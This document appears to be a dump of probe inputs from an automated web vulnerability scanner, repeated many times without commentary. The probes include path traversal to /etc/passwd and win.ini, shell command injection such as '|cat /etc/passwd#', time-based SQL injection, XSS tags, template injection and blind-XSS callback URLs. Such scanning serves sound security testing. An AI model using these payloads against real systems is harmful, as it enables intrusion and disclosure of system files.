..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

"&cat /etc/passwd&"

1

1

1

1<img src=xyz OnErRor=prompt(960813)>

WEB-INF\web.xml

../../../../../../../../../../etc/passwd.jpg

1

cat /etc/passwd

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${99701+99772}

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1<img/src=">" onerror=alert(915889)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1&n901182=v902292

1some_inexistent_file_with_long_name%00.jpg

-1

1

1<ScRiPt%20>prompt(998997)</sCripT>

1

)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1)

1&lt

testasp.vulnweb.com

!(()&&!|*|*|

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

'"()

-1))

'

1

^(#$!@#$)(()))******

\xf6<img acu onmouseover=prompt(992645) //\xf6>

1

1

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"

FRGYP3aE'

1

1

1<input autofocus onfocus=prompt(970865)>

1

1

mgSw3Y1m')

${@print(md5(acunetix_wvs_security_test))}

1

/etc/passwd

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

jBRHz6zd'))

${@print(md5(acunetix_wvs_security_test))}\

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

[url=http://www.acunetix.com]website security[/url]

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

acunetix_wvs_invalid_filename

1

http://hitZeRPLTgsmd.bxss.me/

-1

1

"

1

1

comments

1_YzzeA <ScRiPt >prompt(921061)</ScRiPt>

||cat /etc/passwd

-1)

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

comments

1

-1))

&dir

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'"

http://www.acunetix.tst

1

1

comments/.

1

Wns65xBY'

'&dir&'

1'"()&%<ScRiPt >prompt(944738)</ScRiPt>

<!--

1

1

1

OL8adSUe')

1

1

1

1

1

file:///etc/passwd

'"()&%<ScRiPt >prompt(994461)</ScRiPt>

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

nFoGy22I'))

1

1

1

1

1_934239

1

WEB-INF/web.xml

|dir

1

1

'|dir

1

WEB-INF\web.xml

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

acu8854\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8854

1

../../../../../../../../../../windows/win.ini.jpg

1

acux6273\xc0\xbez1\xc0\xbcz2a\x90bcxuca6273

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(985624)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(921621)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(944534)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

response.write(9646792*9804010)

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?975739></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

'+response.write(9646792*9804010)+'

1<ScRiPt >prompt(952662)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<video><source onerror="javascript:prompt(966381)">

1

1

"+response.write(9646792*9804010)+"

&cat /etc/passwd&

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(983177)"></g></svg>

'&cat /etc/passwd&'

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF/web.xml

1<div style=width:expression(prompt(975977))>

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

cat /etc/passwd

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(931011)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

`cat /etc/passwd`

1

1

1

1

${99262+99341}

1

-1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(990434)>

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1

1

1

1

1<img src=xyz OnErRor=prompt(972155)>

-1)

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n927363=v936026

1<img/src=">" onerror=alert(994654)>

1

1

-1))

)

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

"|"ld

1<ScRiPt%20>prompt(948492)</sCripT>

1

1

GWmwPM3P'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

1

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&lt

5ASarY5H')

1

testasp.vulnweb.com

1

'

1

1

/etc/passwd

\xf6<img acu onmouseover=prompt(956031) //\xf6>

htpVX4kI'))

'

1

1

1

"

1

1

1<input autofocus onfocus=prompt(980033)>

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

1

||cat /etc/passwd

<a href='http://www.acunetix.com'>website security</a>

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

http://hitpTWU9KrNnt.bxss.me/

[url=http://www.acunetix.com]website security[/url]

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1))

1

1

acunetix_wvs_invalid_filename

1

'&dir&'

1

1_VzCZa <ScRiPt >prompt(919124)</ScRiPt>

TIgdGdHC'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

1

1

"&dir&"

lXYy8I9x')

http://www.acunetix.tst

1

comments

file:///etc/passwd

'"

1

1'"()&%<ScRiPt >prompt(985195)</ScRiPt>

|dir

gVTk5VDJ'))

<!--

comments/.

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'|dir

'"()&%<ScRiPt >prompt(934519)</ScRiPt>

1

1

1

1

1

WEB-INF/web.xml

1

1_944201

"|dir

1

1

1

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acu1840\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1840

1

../../../../../../../../../../boot.ini

1

1

acux7540\xc0\xbez1\xc0\xbcz2a\x90bcxuca7540

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(944315)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1<script>prompt(965472)</script>

1

1

1

1<ScRiPt >prompt(972059)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?963881></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(970910)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(907933)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(988806)"></g></svg>

1

response.write(9012202*9668361)

WEB-INF/web.xml

1

1<div style=width:expression(prompt(911858))>

1

WEB-INF\web.xml

'+response.write(9012202*9668361)+'

1

1

1<iframe src='data:text/html

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9012202*9668361)+"

&cat /etc/passwd&

1<body onload=prompt(974965)>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(987270)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(979952)>

1

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(9.891),0)/*'XOR(if(now()=sysdate(),sleep(9.891),0))OR'"XOR(if(now()=sysdate(),sleep(9.891),0))OR"*/

1

1

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(964974)>

cat /etc/passwd

1

1

(select(0)from(select(sleep(9.891)))v)/*'+(select(0)from(select(sleep(9.891)))v)+'"+(select(0)from(select(sleep(9.891)))v)+"*/

${99031+99008}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

`cat /etc/passwd`

1<ScRiPt%20>prompt(963005)</sCripT>

1

-1

1&n907476=v959549

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

)

|cat /etc/passwd#

1&lt

-1)

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

-1))

1

\xf6<img acu onmouseover=prompt(983115) //\xf6>

'|'ld

1

1

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(964157)>

zmGxQ2UF'

1

"|"ld

1

/etc/passwd

'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

SVJVVXdB')

1

1

1

"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

[url=http://www.acunetix.com]website security[/url]

'

C4C4mBst'))

1

acunetix_wvs_invalid_filename

1_wnerS <ScRiPt >prompt(947908)</ScRiPt>

http://hitmvjOiwJIAD.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

1

comments

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

-1)

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

&dir

-1))

1

comments/.

1

1

1

'"

file:///etc/passwd

1

DhkW0dk0'

'&dir&'

1

1'"()&%<ScRiPt >prompt(990764)</ScRiPt>

<!--

81ApmsLH')

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1

1

1

1

WEB-INF/web.xml

4mh7kf5U'))

'"()&%<ScRiPt >prompt(992733)</ScRiPt>

1

1

1

|dir

1

1

1_921159

1

WEB-INF\web.xml

'|dir

1

1

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acu2016\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2016

1

1

acux4199\xc0\xbez1\xc0\xbcz2a\x90bcxuca4199

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(973549)</ScRiPt>

1

................windowswin.ini

1

1<script>prompt(930005)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(968755)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

response.write(9646652*9899474)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?902475></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

'+response.write(9646652*9899474)+'

1

&cat /etc/passwd&

1

1<ScRiPt >prompt(922567)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

"+response.write(9646652*9899474)+"

1

1<video><source onerror="javascript:prompt(946107)">

1

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(906325)"></g></svg>

1

1

1

1

"&cat /etc/passwd&"

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1<div style=width:expression(prompt(974182))>

../../../../../../../../../../etc/passwd

1

WEB-INF\web.xml

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

cat /etc/passwd

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

`cat /etc/passwd`

${99497+100062}

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1<body onload=prompt(957335)>

../../../../../../../../../../etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

|cat /etc/passwd#

1

-1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(948101)>

1some_inexistent_file_with_long_name%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n901063=v947404

)

1

-1)

'|'ld

1

1

1<img src=xyz OnErRor=prompt(993095)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

!(()&&!|*|*|

1

1

"|"ld

1

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img/src=">" onerror=alert(921547)>

'"()

dKFs1Ieg'

^(#$!@#$)(()))******

1

1

1

1<ScRiPt%20>prompt(956629)</sCripT>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'

jjeFOdPD')

1

1&lt

1

1

1

'

"

1

/etc/passwd

Aut6uLbV'))

\xf6<img acu onmouseover=prompt(953015) //\xf6>

1

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<input autofocus onfocus=prompt(929432)>

-1

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

-1)

http://hitIVaA5c630w.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

acunetix_wvs_invalid_filename

1

1

-1))

1

&dir

[url=http://www.acunetix.com]website security[/url]

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

FqVDQtSe'

comments

http://www.acunetix.tst

1_WWxVg <ScRiPt >prompt(945878)</ScRiPt>

'&dir&'

1

1

'"

AuKLCks6')

comments/.

1

file:///etc/passwd

"&dir&"

1

1

<!--

1

cBaSiPlB'))

1

/\../\../\../\../\../\../\../etc/passwd

|dir

1

1

1

1'"()&%<ScRiPt >prompt(944474)</ScRiPt>

1

WEB-INF/web.xml

'|dir

1

1

1

1

1

'"()&%<ScRiPt >prompt(949695)</ScRiPt>

WEB-INF\web.xml

"|dir

1

1

1

1

1_944943

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu1549\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1549

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux4768\xc0\xbez1\xc0\xbcz2a\x90bcxuca4768

1

1

1

1

1<ScRiPt >prompt(919638)</ScRiPt>

................windowswin.ini

1

1

1

1<script>prompt(971435)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(920801)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?902356></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(907297)</ScRiPt>

1

1

response.write(9532303*9372080)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(945262)">

1

'+response.write(9532303*9372080)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(984604)"></g></svg>

&cat /etc/passwd&

1

1

1

"+response.write(9532303*9372080)+"

SomeCustomInjectedHeader:injected_by_wvs

1<div style=width:expression(prompt(985504))>

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(945537)>

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

1

-1

`cat /etc/passwd`

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(986677)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1)

${99664+99650}

1

1

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(999955)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1&n957824=v944280

1<img/src=">" onerror=alert(933977)>

)

'|'ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

q8ZvBZBK'

1some_inexistent_file_with_long_name%00.jpg

SqEENP28')

1

!(()&&!|*|*|

1

1<ScRiPt%20>prompt(920514)</sCripT>

"|"ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

MlwwU7hi'))

^(#$!@#$)(()))******

1&lt

1

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

testasp.vulnweb.com

'

-1

1

'

1

1

\xf6<img acu onmouseover=prompt(985449) //\xf6>

1

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

1

1

"

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1<input autofocus onfocus=prompt(988334)>

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitTE8zWZrqTI.bxss.me/

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

<a href='http://www.acunetix.com'>website security</a>

JR66t46g'

1

${@print(md5(acunetix_wvs_security_test))}\

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

&dir

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

Zq6PBBmk')

'&dir&'

comments

1_MWYko <ScRiPt >prompt(924416)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

'"

1

file:///etc/passwd

eLH8VJSO'))

comments/.

1

"&dir&"

1

<!--

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(904518)</ScRiPt>

|dir

1

1

1

1

1

1

'"()&%<ScRiPt >prompt(944925)</ScRiPt>

WEB-INF/web.xml

1

1

1

'|dir

1

1

1_951985

1

1

WEB-INF\web.xml

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu9856\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9856

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux1412\xc0\xbez1\xc0\xbcz2a\x90bcxuca1412

1

1

................windowswin.ini

1

1<ScRiPt >prompt(906349)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(941234)</script>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(981292)</ScRiPt>

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?953649></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(931737)</ScRiPt>

response.write(9853457*9163584)

1

1

1

1<video><source onerror="javascript:prompt(969639)">

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9853457*9163584)+'

WEB-INF/web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(905875)"></g></svg>

1

'&cat /etc/passwd&'

"+response.write(9853457*9163584)+"

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

1<div style=width:expression(prompt(973656))>

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1<iframe src='data:text/html

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

cat /etc/passwd

1

1<body onload=prompt(935403)>

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

-1

`cat /etc/passwd`

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(981792)>

${99715+99273}

1

1

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(930290)>

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1))

1&n951992=v999118

1<img/src=">" onerror=alert(937412)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

1

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

S8R89I9h'

'"()

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt%20>prompt(985166)</sCripT>

1

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

5qDf7gF3')

1

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&lt

testasp.vulnweb.com

1

1

IwYCIM96'))

1

1

'

\xf6<img acu onmouseover=prompt(935239) //\xf6>

/etc/passwd

'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<input autofocus onfocus=prompt(912625)>

"

"

1

1

1

-1)

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}

<a href='http://www.acunetix.com'>website security</a>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

1

http://hit5G34e4yr1d.bxss.me/

1

-1))

comments

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}\

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

py3ZOXXK'

1

1

comments

1

1_TOQBQ <ScRiPt >prompt(993822)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

'&dir&'

v1Isryw0')

1

1

http://www.acunetix.tst

comments/.

1

1

file:///etc/passwd

"&dir&"

bT8F2BY5'))

'"

1

1

1

1

1

1

<!--

1'"()&%<ScRiPt >prompt(929647)</ScRiPt>

|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'"()&%<ScRiPt >prompt(988592)</ScRiPt>

'|dir

1

1

1

WEB-INF/web.xml

"|dir

1_917061

1

1

1

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

acu5894\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5894

../../../../../../../../../../boot.ini

1

1

1

acux7803\xc0\xbez1\xc0\xbcz2a\x90bcxuca7803

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<ScRiPt >prompt(995748)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(995575)</script>

1

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(910383)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?978362></ScRiPt>

response.write(9164412*9889988)

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(959364)</ScRiPt>

1

&cat /etc/passwd&

'+response.write(9164412*9889988)+'

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(906807)">

1

"+response.write(9164412*9889988)+"

1

1

'&cat /etc/passwd&'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(972073)"></g></svg>

